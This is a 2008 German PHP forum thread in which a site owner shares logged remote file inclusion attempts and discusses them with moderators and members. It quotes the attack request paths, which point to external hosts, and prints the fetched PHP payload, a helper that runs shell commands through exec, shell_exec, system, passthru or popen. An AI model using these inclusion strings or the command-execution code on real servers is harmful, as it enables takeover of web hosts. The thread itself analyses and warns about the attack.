php-resource



Zurück   PHP-Scripte PHP-Tutorials PHP-Jobs und vieles mehr > IT-Security Forum > IT-Security
 

Login

 
eingeloggt bleiben
star Jetzt registrieren   star Passwort vergessen
 

 

 


IT-Security Alles rund um IT-Security aus den Bereichen Hard- und Software

Antwort
 
LinkBack Themen-Optionen Thema bewerten
  #1 (permalink)  
Alt 01-07-2008, 23:44
dunixphp
 Newbie
Links : Onlinestatus : dunixphp ist offline
Registriert seit: Apr 2008
Beiträge: 31
dunixphp ist zur Zeit noch ein unbeschriebenes Blatt
Standard Hacker ?!

schaut euch mal diese referer an.
Da will doch jemand meinen Server übernehmen!

/index.php?prefix=http://www.vanderjagt-kraanverhuur.nl/id.txt?
/errors.php?error=http://fuckyou.fileave.com/alb.txt??
Mit Zitat antworten
  #2 (permalink)  
Alt 01-07-2008, 23:48
unset
  Moderator
Links : Onlinestatus : unset ist offline
Registriert seit: Jan 2007
Ort: Düsseldorf
Beiträge: 3.782
unset befindet sich auf einem aufstrebenden Ast
Standard

Und jetzt?
Mit Zitat antworten
  #3 (permalink)  
Alt 02-07-2008, 00:17
dunixphp
 Newbie
Links : Onlinestatus : dunixphp ist offline
Registriert seit: Apr 2008
Beiträge: 31
dunixphp ist zur Zeit noch ein unbeschriebenes Blatt
Standard

nix!

ich finde es nur sehr spannend
Mit Zitat antworten
  #4 (permalink)  
Alt 02-07-2008, 00:22
unset
  Moderator
Links : Onlinestatus : unset ist offline
Registriert seit: Jan 2007
Ort: Düsseldorf
Beiträge: 3.782
unset befindet sich auf einem aufstrebenden Ast
Standard

Ich finds eher gähnend langweilig. Hat er denn wenigstens Erfolg gehabt. Dann kann man dich wenigstens darauf hinweisen, deine Lücken zu stopfen, statt uns hier mit deinen Trivialitäten zu nerven.
Mit Zitat antworten
  #5 (permalink)  
Alt 02-07-2008, 10:50
dunixphp
 Newbie
Links : Onlinestatus : dunixphp ist offline
Registriert seit: Apr 2008
Beiträge: 31
dunixphp ist zur Zeit noch ein unbeschriebenes Blatt
Standard

tut mir leid









Ich finde es trotzdem spannend
Mit Zitat antworten
  #6 (permalink)  
Alt 02-07-2008, 11:05
UzumakiNaruto
 Registrierter Benutzer
Links : Onlinestatus : UzumakiNaruto ist offline
Registriert seit: Nov 2004
Beiträge: 642
UzumakiNaruto befindet sich auf einem aufstrebenden Ast
Standard

ich würde mal eher behaupten dort will jemand links in deine datenbank schreiben
__________________
Gruß
Uzu

private Homepage
Mit Zitat antworten
  #7 (permalink)  
Alt 02-07-2008, 11:44
dunixphp
 Newbie
Links : Onlinestatus : dunixphp ist offline
Registriert seit: Apr 2008
Beiträge: 31
dunixphp ist zur Zeit noch ein unbeschriebenes Blatt
Standard

Der will Befehle auf dem Server ausführen

PHP-Code:
echo "Mic22";
$cmd="id";
$eseguicmd=ex($cmd);
echo 
$eseguicmd;
function 
ex($cfe){
$res '';
if (!empty(
$cfe)){
if(
function_exists('exec')){
@
exec($cfe,$res);
$res join("\n",$res);
}
elseif(
function_exists('shell_exec')){
$res = @shell_exec($cfe);
}
elseif(
function_exists('system')){
@
ob_start();
@
system($cfe);
$res = @ob_get_contents();
@
ob_end_clean();
}
elseif(
function_exists('passthru')){
@
ob_start();
@
passthru($cfe);
$res = @ob_get_contents();
@
ob_end_clean();
}
elseif(@
is_resource($f = @popen($cfe,"r"))){
$res "";
while(!@
feof($f)) { $res .= @fread($f,1024); }
@
pclose($f);
}}
return 
$res;
}
exit; 
Mit Zitat antworten
  #8 (permalink)  
Alt 02-07-2008, 14:33
Flip7
 Registrierter Benutzer
Links : Onlinestatus : Flip7 ist offline
Registriert seit: May 2007
Ort: Munich
Beiträge: 126
Flip7 ist zur Zeit noch ein unbeschriebenes Blatt
Flip7 eine Nachricht über ICQ schicken
Standard

Auf http://fuckyou.fileave.com/ würden Spamer schöne Adressen finden :-D

und die niederländische Seite da verkauft oder vermietet Bagger :-D

komische Leute, aber @dunixphp JA das sind Hackerangriffe, jedoch irgendwie harmlose...

Ist aber ganz lustig alles zu überwachen, gell
__________________
Find Parties?
Partysuche
Mit Zitat antworten
  #9 (permalink)  
Alt 02-07-2008, 16:51
Benutzerbild von onemorenerd onemorenerd
  Moderator
Links : Onlinestatus : onemorenerd ist offline
Registriert seit: Mar 2005
Ort: Berlin
Beiträge: 9.471
onemorenerd wird schon bald berühmt werdenonemorenerd wird schon bald berühmt werden
Standard

Als harmlos würde ich das nicht bezeichnen. Die Art des Angriffs mag banal sein, aber wenn es klappt, hat man eine PHP-Shell mit der man ziemlichen Schaden anrichten kann. Die Erfolgschancen für den Angreifer dürften nicht schlecht stehen, wenn man bedenkt wieviele Leute hier immer wieder ungefiltert GET-Parameter für include nutzen.
Mit Zitat antworten
  #10 (permalink)  
Alt 02-07-2008, 17:10
h3ll
 Registrierter Benutzer
Links : Onlinestatus : h3ll ist offline
Registriert seit: Mar 2008
Beiträge: 3.595
h3ll befindet sich auf einem aufstrebenden Ast
Standard

Zitat:
Original geschrieben von onemorenerd
Als harmlos würde ich das nicht bezeichnen. Die Art des Angriffs mag banal sein, aber wenn es klappt, hat man eine PHP-Shell mit der man ziemlichen Schaden anrichten kann. Die Erfolgschancen für den Angreifer dürften nicht schlecht stehen, wenn man bedenkt wieviele Leute hier immer wieder ungefiltert GET-Parameter für include nutzen.
Was meiner Meinung nach genauso fahrlässig ist wie ein Auto mit geöffneten Fenstern abzustellen und darin den Zündschlüssel stecken zu lassen.
Mit Zitat antworten
  #11 (permalink)  
Alt 02-07-2008, 17:17
unset
  Moderator
Links : Onlinestatus : unset ist offline
Registriert seit: Jan 2007
Ort: Düsseldorf
Beiträge: 3.782
unset befindet sich auf einem aufstrebenden Ast
Standard

Wobei in dem Fall nur der Besitzer des Autos den Schaden hat. Unter einer gekaperten Kiste leiden im Zweifelsfall wesentlich mehr Menschen.
Mit Zitat antworten
  #12 (permalink)  
Alt 02-07-2008, 19:13
dunixphp
 Newbie
Links : Onlinestatus : dunixphp ist offline
Registriert seit: Apr 2008
Beiträge: 31
dunixphp ist zur Zeit noch ein unbeschriebenes Blatt
Standard

harmlos mit Sicherheit nicht!
*Lehrgeld bereits bezahlt*
Mit Zitat antworten
Antwort

Lesezeichen


Aktive Benutzer in diesem Thema: 1 (Registrierte Benutzer: 0, Gäste: 1)
 

Themen-Optionen
Thema bewerten
Thema bewerten:

Forumregeln
Es ist Ihnen nicht erlaubt, neue Themen zu verfassen.
Es ist Ihnen nicht erlaubt, auf Beiträge zu antworten.
Es ist Ihnen nicht erlaubt, Anhänge hochzuladen.
Es ist Ihnen nicht erlaubt, Ihre Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks are an
Pingbacks are an
Refbacks are an


PHP News

ebiz-trader 7.5.0 mit PHP7 Unterstützung veröffentlicht
ebiz-trader 7.5.0 mit PHP7 Unterstützung veröffentlichtDie bekannte Marktplatzsoftware ebiz-trader ist in der Version 7.5.0 veröffentlicht worden.

28.05.2018 | Berni

Wissensbestand in Unternehmen
Wissensbestand in UnternehmenLebenslanges Lernen und Weiterbilden sichert Wissensbestand in Unternehmen

25.05.2018 | Berni


 

Aktuelle PHP Scripte

ADSMAN V3 - Werbe-Manager ansehen ADSMAN V3 - Werbe-Manager

ADSMAN V3 - mehr als nur ein Bannermanager! Banner, Textanzeigen und PagePeel Manager! Mit ADSMAN PRO haben Sie die Marketinglösung für eine effektive und effiziente Werbeschaltung mit messbaren Ergebnissen. Unterstützt werden Bannerformate in beliebi

25.10.2018 virtualsystem | Kategorie: PHP/ Bannerverwaltung
PHP News und Artikel Script V2

News schreiben, verwalten, veröffentlichen. Dies ist jetzt mit dem neuen PHP News & Artikel System von virtualsystem.de noch einfacher. Die integrierte Multi-User-Funktion und der WYSIWYG-Editor (MS-Office ähnliche Bedienung) ermöglichen...

25.10.2018 virtualsystem | Kategorie: PHP/ News
Top-Side Guestbook

Gästebuch auf Textbasis (kein MySQL nötig) mit Smilies, Ip Sperre (Zeit selbst einstellbar), Spamschutz, Captcha (Code-Eingabe), BB-Code, Hitcounter, Löschfunktion, Editierfunktion, Kommentarfunktion, Kürzung langer Wörter, Seiten- bzw. Blätterfunktion, V

22.10.2018 webmaster10 | Kategorie: PHP/ Gaestebuch
 Alle PHP Scripte anzeigen

Alle Zeitangaben in WEZ +2. Es ist jetzt 03:37 Uhr.